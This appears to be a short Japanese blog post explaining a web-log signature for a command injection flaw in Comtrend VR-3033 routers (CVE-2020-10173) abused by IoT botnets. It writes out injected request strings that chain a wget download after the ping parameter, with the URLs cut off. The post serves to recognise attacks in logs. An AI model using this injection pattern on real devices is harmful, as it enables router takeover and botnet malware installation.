“GET /ping.cgi?pingIpAddress=google.fr;wget%20http://


GET /ping.cgi?pingIpAddress=google.fr

GETリクエストは、ボットネットがIoTデバイス、
特にComtrend VR-3033ルーターを標的にするために悪用するコマンドインジェクションの脆弱性GET /ping.cgi?pingIpAddress=google.fr(CVE-2020-10173)の特徴的なシグネチャです

この要請の主なポイント:

脆弱性メカニズム:
このpingIpAddressパラメータは入力を適切にサニタイズしないため、攻撃者は悪意のあるコマンド(多くの場合、;またはを使用%20)をURLに追加して、ターゲットデバイス上で任意のコードを実行できます。

IoTボットネット活動:
この特定の文字列は、ルーターを侵害するために、Mirai亜種やシェルスクリプトなどの追加のマルウェアペイロードをダウンロードするマルウェアキャンペーン(例:IoTボットネットレポート2021/2022-2023)で広く観測されています。

一般的なペイロード構造:攻撃者は、ping コマンドを悪意のあるアクションと連鎖させることがよくあります。例: GET /ping.cgi?pingIpAddress=google.fr;cd /tmp; wget http://…。
対象デバイス:この脆弱性は、一般的にComtrend VR-3033ルーターに関連しています。

ウェブログに見られるこの種の要求は、通常、ネットワーク機器上でリモートコード実行(RCE)の脆弱性を悪用または確認しようとする試みを示しています。


コメントを残す

メールアドレスが公開されることはありません。 が付いている欄は必須項目です